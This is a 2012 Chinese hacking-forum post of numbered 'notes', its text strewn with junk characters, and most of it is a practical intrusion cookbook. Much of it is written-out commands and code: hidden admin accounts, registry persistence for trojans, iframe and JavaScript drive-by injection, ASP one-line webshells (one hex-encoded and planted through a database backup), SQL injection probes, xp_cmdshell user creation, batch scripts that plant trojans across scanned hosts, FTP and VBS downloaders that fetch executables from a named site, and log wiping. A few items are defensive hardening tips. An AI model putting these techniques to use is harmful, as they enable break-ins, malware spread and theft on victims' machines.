找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2246|回复: 0
打印 上一主题 下一主题

一些笔记

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:51:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,( w: h, Z/ D. O. O- A( H: k5 K
cacls C:\windows\system32 /G hqw20:R# @2 D0 T/ c* L9 }. `; P
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
+ e' {; P! z9 d& n0 W2 ]8 i恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
/ @+ H5 g3 Z: t. G/ I% ~# R) x5 t" i! y/ F
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
. E5 ?0 |4 o# O$ m, |* o1 C! ^( B2 B0 F
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
5 ~' W2 J& u, ~, U& {5 G
. K% o% t" f' O6 h4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
0 \" U  N2 u& }2 i% }# y0 q, v
2 _. f3 \( `2 A8 m, ~) _5、利用INF文件来修改注册表
8 h1 |( d6 [( I: C5 U! a9 i* L[Version]
- @- G" V( z; R/ O% MSignature="$CHICAGO$"
4 `0 |# z* S4 n  R- O[Defaultinstall]
! ]2 ^% h5 o- _7 P3 y: @: naddREG=Ating8 C& T  S6 C. L
[Ating]- `5 u5 I0 ?7 @! k7 l
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
4 {3 s  P. V" K8 C) Y) K以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:1 t' r/ y7 J' B! F; b+ o
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径  D0 ?( N. Q9 c) c  K5 r% K
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU) L1 K( }+ m/ O& Z7 w6 w7 ]: ]- o
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU. O% Y% S+ U* O
HKEY_CURRENT_CONFIG 简写为 HKCC
# j* {+ r$ t, h# D0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值' @! |( ~$ G) B1 H. Z4 x$ i% o1 f
"1"这里代表是写入或删除注册表键值中的具体数据
) {1 l- h* [" d: {6 W" w
: [, u5 v9 R( y8 z+ X6 u6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,9 E6 C) a9 k+ E/ J2 y
多了一步就是在防火墙里添加个端口,然后导出其键值
) ^( c* _4 k* \2 M2 ~% q6 `[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
+ q- @) |6 l! }( J" O7 f% [7 U0 h0 c7 l) N: i4 s+ X6 B& [
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
/ I) _8 l8 h: D1 g( [! e3 M在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。. Q2 K" q! n$ W! L. ?$ S9 \
4 N6 m- i' b5 u- L
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
2 P8 r7 T/ z, U9 Z7 Y" q$ ]* u0 t8 H' ~7 K) E6 w9 B) e
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
% z% e# B3 G  E8 i可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
2 z/ [9 n0 r2 w2 V- o# i1 o2 N1 ]! x  b" P- }$ e/ [
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”- ^0 m5 d3 T0 \9 L* D% \
6 G2 O0 w- P6 o' _# w7 z; W
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,% h6 H. K' x0 e- ]+ }
用法:xsniff –pass –hide –log pass.txt
8 ^& w- [+ g+ O% a* R4 ?! b/ L$ \2 B1 o6 R5 z
12、google搜索的艺术5 m" M* t) B. m
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”" a2 L" T" d, \" h" W" U; F
或“字符串的语法错误”可以找到很多sql注入漏洞。
$ T8 z! o4 l( F' S; j2 B# S) f8 G$ q& [0 `7 u$ D/ q
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
( m$ N: z4 w; Q& E' D/ v5 n, v( l" |4 Z2 |; c5 [2 O
14、cmd中输入 nc –vv –l –p 1987
$ k8 D# [$ D& x2 L0 Y做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
8 ?. U/ t; K. m3 q' ^; b
# A0 b$ R: P( f$ b# x15、制作T++木马,先写个ating.hta文件,内容为
* w+ O3 q/ U' S0 |2 p' z( G, d! x2 V<script language="VBScript">/ Z6 v6 r' s, d4 H, ^9 l" N6 n+ @
set wshshell=createobject ("wscript.shell" )/ T+ R9 i3 y1 ^: b# M) Z
a=wshshell.run("你马的名称",1)# G" l$ ?! z7 R/ \2 o9 Z$ y: ?
window.close
; P: s8 q5 {3 Z( Q# F" d; i) Q</script>
' L) ~1 J% r" a再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。' v) u' w( Q" E) m6 b9 _

. R! M2 F' i9 S* t( h8 `& x8 D16、搜索栏里输入3 V$ L/ I* j: t' ~! ]8 L, C
关键字%'and 1=1 and '%'=') @* M* N; E: d4 w& q* o- ], B
关键字%'and 1=2 and '%'='
/ y5 Q1 r4 G# o3 u# f比较不同处 可以作为注入的特征字符
. S0 O  Y1 G4 V! Q1 c, C( f, `2 z
5 \$ y" ^( S5 E* f17、挂马代码<html>$ n+ S- v' ]. Z4 e
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>! r, |) N3 w& M
</html>+ S" o; b* B5 U4 O! n

" l3 m. ?# X  U9 y! @, R$ Z  D. N18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,  [% z  N5 |9 i. ^
net localgroup administrators还是可以看出Guest是管理员来。$ v* F2 ~: {' z8 l4 ]$ D7 r
. K4 n' _) O7 ?/ l& _/ A
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等( m, ?) C( p7 g8 v: A8 U
用法: 安装: instsrv.exe 服务名称 路径
  M' o0 l8 M7 Z$ C$ Q. w) C卸载: instsrv.exe 服务名称 REMOVE3 O$ ~: b& t5 Q- l$ c$ k
/ e' ?6 c0 Z& P5 [" g% l3 q4 V" N0 N' o
% W; r5 ?( }8 ~# r- @0 L
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
, A( T- L1 N) c1 M, ?$ o不能注入时要第一时间想到%5c暴库。4 ~5 e; |$ ]. `6 l% Z: y# t3 O/ _: V

# N! @9 v* q$ p' |+ l22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
) U9 f* N- T+ L/ j- }# F
, v% K( Q/ d8 k- @4 C2 ?23、缺少xp_cmdshell时; Y* o1 M6 N( [6 o2 u" d
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'- Z0 J: Q4 G0 G( S  T
假如恢复不成功,可以尝试直接加用户(针对开3389的)" g5 W+ ^+ U* t! l
declare @o int. O- W4 ]1 G% V- l
exec sp_oacreate 'wscript.shell',@o out
' F6 s* f! Z* N! mexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员- r+ }9 T# r% I, T7 G

7 D% T7 A# _9 m2 k2 c+ \$ X- u24.批量种植木马.bat
  c$ g' i) G  c5 M& d  L; Cfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中+ X- \" N0 u' Q9 F* K
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间4 C5 W6 [4 c$ G* ]- \3 e
扫描地址.txt里每个主机名一行 用\\开头5 A) y( ~/ q* V
9 |/ x' b+ k; B7 |# u( E
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。) j1 O. b4 x9 O

$ @; U7 N- O9 ?% d: I7 o26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
0 H' b' j! e0 n( Y% g: z将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
: ~  i) A' {1 x4 Z4 }1 N& |.cer 等后缀的文件夹下都可以运行任何后缀的asp木马, `" R7 g, V) C* Y

4 b. A3 K0 @0 u" H- z" G  s* O27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
, k/ u- G4 t& \: D然后用#clear logg和#clear line vty *删除日志2 Q/ |5 ?" F; b# b! E# g; R: u
; h2 w' F& E) z4 ^: X  H4 j
28、电脑坏了省去重新安装系统的方法
9 e6 A6 _0 J" a, K1 o! q- ]: v( d纯dos下执行,: O& I) D. _  |$ `
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
$ ?' w  G# j6 V* A5 ^  ]$ s5 O. L2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
3 m3 d% G: X6 b/ w9 V0 V, v% R; O; w7 V
29、解决TCP/IP筛选 在注册表里有三处,分别是:
2 @6 }9 m8 B( y# L3 r5 KHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
& e7 x  i" q; g0 u# [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
$ ~* w: \" I/ B, s2 R5 q# IHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
* Q! Q% Q2 s/ ~! O分别用7 {7 ?0 @( O2 }' r3 L* T
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip, A8 b" N* F% b
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip) N1 G7 R, E' u% r0 S3 T: ^( F
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip# w; V7 q4 r6 E. l( ?# I' |/ k
命令来导出注册表项
- |. v4 e% E. g$ Z! D" Q5 E: U然后把三个文件里的EnableSecurityFilters"=dword:00000001,
0 U7 _2 Z8 R. v( C改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用0 R, S! E. v) w& ?5 x
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。' L6 S- @1 ]$ W1 i8 }( X4 I5 {9 n

6 d2 A9 x; I7 j& Q0 T3 _# G30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
1 b4 D9 l* i; @  O6 n, a/ dSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3. P! d: L# j8 i  M2 K

: K5 K, b6 l$ c( `" j31、全手工打造开3389工具
1 z7 E4 |# F- R( \打开记事本,编辑内容如下:2 Z4 k: m& C0 t' E2 {9 m7 z
echo [Components] > c:\sql
* x- Q9 h. S* Secho TSEnable = on >> c:\sql* J0 Y9 v; t5 j1 F% X9 R
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
( ^0 T  o" R7 ^, i; H/ z编辑好后存为BAT文件,上传至肉鸡,执行
3 h% [0 l3 T) C" \, r: H( _+ e0 p6 K. _9 ^7 y0 F1 X! D
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马- Y2 A6 D5 z" K! N& M9 F1 B) }

- U6 d2 A) ?0 `$ M8 ~) B' N% K33、让服务器重启
5 t( K& p  z2 ~5 h6 T. o4 W6 q* V写个bat死循环:
- i5 v- v6 |. r! g% G* v% D) C@echo off8 c- [- g$ R( {7 E7 U& m
:loop1$ s, e/ A5 C1 g" F6 M. A! h
cls
, u: M1 H0 a7 N/ B2 ]: a7 ]start cmd.exe' @7 a+ V. _1 p. ]$ x( ^
goto loop1
$ Y9 e7 R% d6 R9 C保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
; P& Q, O7 [  k! G
3 |! U/ N7 i( n8 l: S- Q34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,) n: g+ ?! b" P8 H+ c7 R( D3 f/ J
@echo off0 i$ M1 E6 j- ?7 T* l1 {# S
date /t >c:/3389.txt
( `" |; L, N, X9 q4 g; \time /t >>c:/3389.txt% _, s2 P! `$ {
attrib +s +h c:/3389.bat
0 I1 G3 t+ q% x! F6 h1 `attrib +s +h c:/3389.txt) ^8 [( s$ t) ~! D4 g& @! B8 e
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt6 z9 F$ }, f; v# M* h) x+ L
并保存为3389.bat
& y6 t5 o# j! E% P% r2 y, X1 x* r打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
! h& L* h" t, t: }. g4 C# I4 [
. X+ {) H' ?2 y7 k/ O% F6 r/ h35、有时候提不了权限的话,试试这个命令,在命令行里输入:
; w# r" a! c& E* J1 b. Mstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
2 J+ `, ]: L9 X* E. X输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
/ ~& E! X+ R  [) [
! Q" ^" d( \4 T. ^; K' G5 S36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件! j+ J2 u$ c% }" I  }( K7 b
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
- ~8 T3 G6 g& A; l5 F% u. J7 y" Pecho 你的FTP账号 >>c:\1.bat //输入账号" v4 l( T9 {# l% R7 N8 X" ^. ^
echo 你的FTP密码 >>c:\1.bat //输入密码
* R1 g# O( ^4 q  M, ^$ I0 |echo bin >>c:\1.bat //登入- o4 E- x- h" @
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么0 K5 s+ Z( j7 Y- u" G
echo bye >>c:\1.bat //退出% L) c( W# G9 }& r! t
然后执行ftp -s:c:\1.bat即可4 u1 r. u: C- q( g
3 t: [; l% n- g5 ^- X8 U' i/ t
37、修改注册表开3389两法
7 O! W; A. X% K(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表$ W" d' }; ~& T3 u& v& h7 |/ y
echo Windows Registry Editor Version 5.00 >>3389.reg, `% D) t, _' J  Z5 }# ?7 n, z8 s
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
2 C& Z# T0 l' e! E; ?3 Zecho "Enabled"="0" >>3389.reg
* v( ~/ v5 k9 c4 G! Decho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
7 ^/ M# G* g4 d6 I7 U/ B8 e( [& yNT\CurrentVersion\Winlogon] >>3389.reg; ^! X  q5 S# P5 a6 b- d; e. }
echo "ShutdownWithoutLogon"="0" >>3389.reg3 T5 d0 k0 P/ K
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
5 `) ?; n9 r6 d: a  m9 P>>3389.reg
9 J$ ?! z$ T7 Jecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
! c/ @0 a6 b( w+ X" secho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]7 L  m/ w4 u! F  ]" C( I' l: S
>>3389.reg
" N# b; K2 E# Q" Z7 Xecho "TSEnabled"=dword:00000001 >>3389.reg
# F( d: v4 F4 O6 @; J5 Hecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg- a$ A7 J( y% H6 ^6 X( j$ G8 i
echo "Start"=dword:00000002 >>3389.reg8 @. s, L5 e2 f3 J% z
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService], k# l& L8 o% M# I/ q9 l
>>3389.reg
: |2 m( k# J/ S$ F- k$ a9 fecho "Start"=dword:00000002 >>3389.reg) H! ]1 U- d0 A8 u# _4 A2 @, x! B
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
( `2 \' E1 f6 f$ Cecho "Hotkey"="1" >>3389.reg- |+ A* M7 A3 c7 k: W8 I6 L! x
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal( Q+ \# O+ e2 ~. I* G
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
  |& k# F* l. a! necho "PortNumber"=dword:00000D3D >>3389.reg% k# Y1 u& O: f5 d' A
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal1 D5 k$ U8 H& b
Server\WinStations\RDP-Tcp] >>3389.reg' _, Z, r7 A8 |( c+ l9 L
echo "PortNumber"=dword:00000D3D >>3389.reg
- P, J, i4 X( O把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。7 W  V  P0 c! R5 e; M4 z) Q" f
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
( p& {( |4 Z0 u, T- Z" y" u因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效; S6 F% n# T0 y( q' O
(2)winxp和win2003终端开启6 |; c0 u4 s% {1 t
用以下ECHO代码写一个REG文件:
+ W2 @7 q; k" `$ f+ yecho Windows Registry Editor Version 5.00>>3389.reg
) c3 e% u  A7 Iecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
. N* i$ O/ S& A/ u% l8 K$ \. }Server]>>3389.reg
: _! y' \7 @+ J$ I  z: y. ^  R) Iecho "fDenyTSConnections"=dword:00000000>>3389.reg
7 L* f* ~& k7 c1 necho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal5 w9 ]0 A" B0 H( B; v
Server\Wds\rdpwd\Tds\tcp]>>3389.reg! ]& Q3 D0 M. j5 t# O, N& B
echo "PortNumber"=dword:00000d3d>>3389.reg
& _3 k9 l7 f8 L. l( r: z" [echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
$ _# A5 Q) Q! B4 M* `/ [Server\WinStations\RDP-Tcp]>>3389.reg4 I- I' X8 ~, i$ k6 d! `9 p
echo "PortNumber"=dword:00000d3d>>3389.reg
9 t/ Y5 a; i. r7 ]然后regedit /s 3389.reg del 3389.reg- T9 [: h0 u% n$ t% c
XP下不论开终端还是改终端端口都不需重启
. O5 A. g2 `% K3 C8 B$ |8 v
/ i, {( p/ u) z7 d38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
9 b; {6 {$ f6 x6 ]4 T/ `用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'$ v( v3 R  U2 S: p4 r! C" e9 n/ j* \

1 r- F# C9 [' B5 m39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!$ w$ s8 C* x  h$ K5 |5 ?3 `( n% Z& J
(1)数据库文件名应复杂并要有特殊字符0 E4 k: H0 G2 s
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源# j7 Q# j5 `8 g; c/ _* j
将conn.asp文档中的, R; a: Z  a- B( d
DBPath = Server.MapPath("数据库.mdb")+ \+ d0 j) d5 O8 u  G8 W" p# `
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
$ S3 |" i: G& B
6 ^. J1 j# j# N4 G1 b修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置$ n+ g7 }& w6 G
(3)不放在WEB目录里
. I+ p" R; X9 ~* S: d% C& J+ K4 k7 ]
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
1 C# ~( ?4 \3 d; ?7 H. ?! B可以写两个bat文件4 m0 k+ }. o9 y# [; q( m% K  N
@echo off$ Y& N. {8 t2 T/ H+ U8 o3 l( c" h" r2 E
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
" E4 ]  [) v9 C@del c:\winnt\system32\query.exe
3 w  z+ k; G7 P) o* B@del %SYSTEMROOT%\system32\dllcache\query.exe) g0 j# {8 G1 a; s0 a5 ~
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的+ F, h; ?5 c/ p; a! g1 \6 {

. P$ M( V, n' m7 u/ H+ |$ v@echo off8 g. r* @9 W' C/ C& w
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe- _' M) T1 g; u) T9 Z
@del c:\winnt\system32\tsadmin.exe
/ M  ~% ^7 ^& j5 q+ F$ L9 ~@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex6 \. |1 j  z" l) e/ K0 z# q; t! @( _
9 {6 v. `  _& S$ t( z
41、映射对方盘符
/ Y4 r/ ~) }& I) m) ytelnet到他的机器上,
% X, D+ Y3 t; R8 {" H' snet share 查看有没有默认共享 如果没有,那么就接着运行  U& X. B- a& W
net share c$=c:
& B- P* v' M/ D4 m( L: Q* |net share现在有c$
6 {! Y3 N& W( X; S在自己的机器上运行6 [$ _6 O* C( t* O
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K2 }1 B6 n1 L; j+ _4 L

( }" ^- ?* e+ T+ `4 P" O: E42、一些很有用的老知识( S6 f6 A4 E2 P$ ]1 |" g
type c:\boot.ini ( 查看系统版本 )- x2 o3 k2 g/ h1 u
net start (查看已经启动的服务)% Z: i( }$ w3 j: R  H
query user ( 查看当前终端连接 )4 r. \* G8 f/ m- |3 U, n- J( E
net user ( 查看当前用户 ), e: ?4 c5 r8 c% S# Q; H* q# N
net user 用户 密码/add ( 建立账号 )
. s- ?6 k( B* K; gnet localgroup administrators 用户 /add (提升某用户为管理员)' C4 s  E; G) i( Q/ w6 p
ipconfig -all ( 查看IP什么的 )
! s" e+ C7 o" A2 N+ B) f2 a9 A* Hnetstat -an ( 查看当前网络状态 )
% a' U& L% z4 F9 B# F% _" o* N0 Gfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
2 i" x" q! Q0 J, }: X! f- h" `克隆时Administrator对应1F4
7 ~# r) F1 k1 N5 Yguest对应1F5
2 T! V. G$ \- O" I; z  Ftsinternetuser对应3E8
( y+ _" A/ n7 b$ C7 Q7 r9 a( p$ v! a, Z4 ~" f
43、如果对方没开3389,但是装了Remote Administrator Service
# G% D/ W8 \: Y/ A# E  Z用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
7 f! O$ y) T+ X' l. T解释:用serv-u漏洞导入自己配制好的radmin的注册表信息% ?7 D% n5 E0 a( {: o' N
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"0 [8 A8 n6 w7 @
; }; B; `+ [$ @# x2 R. x6 w9 }
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
/ h. _+ `& r0 m8 Y本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)/ C. B/ b- g  w7 u7 b4 [3 H  u1 N
0 Z2 d2 F6 d! N5 `, `. E
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)& T  l( D% c% @  q# V
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open* K6 g7 j( _4 A# ?" y4 }  i
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =* z& A1 |" {0 M- K
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
- E. K/ b) w* q. c- y1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs6 _  V3 V5 b0 t; L2 k9 I9 O
(这是完整的一句话,其中没有换行符), ]% @8 \; ]  P6 i7 `8 a
然后下载:
/ H- b$ {9 P9 P: Dcscript down.vbs http://www.hack520.org/hack.exe hack.exe. y8 f( S  k) V( D7 R3 l: u0 u

. W2 A. G0 Y3 n4 W  r2 D46、一句话木马成功依赖于两个条件:
. }7 d% V; {, Q8 j1、服务端没有禁止adodb.Stream或FSO组件
) k' M) o% E6 z, E2 E3 }# }1 P2 p/ o2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
2 E, Z) v# i; v; k; p6 T1 y4 r0 }1 K0 @0 l5 d$ z0 B
47、利用DB_OWNER权限进行手工备份一句话木马的代码:2 V8 ]; l- I3 L4 V# I2 z
;alter database utsz set RECOVERY FULL--
8 S* K  z, K1 {4 S( x1 c0 B;create table cmd (a image)--7 M  t( q8 g2 I) D
;backup log utsz to disk = 'D:\cmd' with init--0 y, m, e9 f) y7 l6 S# v1 X) \
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
* M% |- a; ]7 C6 @, l3 h0 g6 k;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--) J- K6 T# l4 S! K6 s8 e5 O1 e$ t
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。. Z& `+ C" k+ d1 n/ t0 R) x

* S' j7 }% C) y0 l) j48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
" i! `5 ~1 J: k4 U& G+ q& F  O, [/ S0 }
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options) |3 x5 U5 I; V" @* r# m
所有会话用 'all'。
4 y( R$ A5 @0 t-s sessionid 列出会话的信息。
, S5 J9 `, c3 ]3 {# v4 E6 B-k sessionid 终止会话。
9 I2 J6 W2 N  n2 l6 A-m sessionid 发送消息到会话。
# S) L8 m- l9 {, v5 h- g3 a
, p( Y0 b9 C: ]6 K% R3 P% N7 Qconfig 配置 telnet 服务器参数。3 U: a4 O" v6 Q+ W7 H# i
5 `  C9 Z  l& l! ~( R: [% K
common_options 为:) R8 |! V0 `: S
-u user 指定要使用其凭据的用户
. ^0 m, U4 t- O1 r/ I8 Q5 ~-p password 用户密码2 B6 [$ C8 C+ n* {% i/ V4 ^
" m" ~' a3 J) v- _: w# A0 `2 I# ~
config_options 为:
9 Y5 A( g0 m6 t1 ~1 ^; u& l9 Pdom = domain 设定用户的默认域9 Z4 A. |( C: s1 O+ v* p: j
ctrlakeymap = yes|no 设定 ALT 键的映射  f" ^. {' U2 G# ]  {2 W  W7 \& N
timeout = hh:mm:ss 设定空闲会话超时值( q% o- c/ R7 h/ X# O1 _- g" j5 Q
timeoutactive = yes|no 启用空闲会话。7 l! u4 v! T' |( g
maxfail = attempts 设定断开前失败的登录企图数。; q7 D: F( j3 F) m
maxconn = connections 设定最大连接数。
) A- _" I9 L4 }8 h. L. {, qport = number 设定 telnet 端口。
7 N7 z' U! D( o" U1 }4 Q2 ?# ]sec = [+/-]NTLM [+/-]passwd. u+ y" Z* Q  F! w8 V
设定身份验证机构
; \/ @) ]: f$ F; n: @+ b7 Q% @fname = file 指定审计文件名。
& G. }& f4 g; V2 dfsize = size 指定审计文件的最大尺寸(MB)。* y( X- s9 d* h3 O: P- u
mode = console|stream 指定操作模式。, K9 f9 W+ z, j5 c) W1 v9 @: S' v# `8 L
auditlocation = eventlog|file|both( I) J; H8 q$ ~$ d
指定记录地点. h; d  `' l  v" z6 j: t, \% j
audit = [+/-]user [+/-]fail [+/-]admin$ {( y3 a2 s- W& G# \* X
6 W$ @- q& q& i$ {
49、例如:在IE上访问:
  j* q$ _( ]5 @3 e; zwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/2 g- J5 _' T/ {8 @6 i0 m
hack.txt里面的代码是:0 \0 ^4 A0 V. }. _) J
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">! d/ }5 L* G0 T5 E
把这个hack.txt发到你空间就可以了!# R/ R- `( v! k* ^  F( b1 k/ A
这个可以利用来做网马哦!6 n8 k% x2 v" ?; M! b
' i; a8 o7 c" F$ m# x
50、autorun的病毒可以通过手动限制!7 I6 v% t6 [: ]0 b/ e5 p
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
" ]/ O& i1 D9 e: C2,打开盘符用右键打开!切忌双击盘符~# _6 `5 T4 i- l) ]  G
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!4 c# c. [8 B9 e
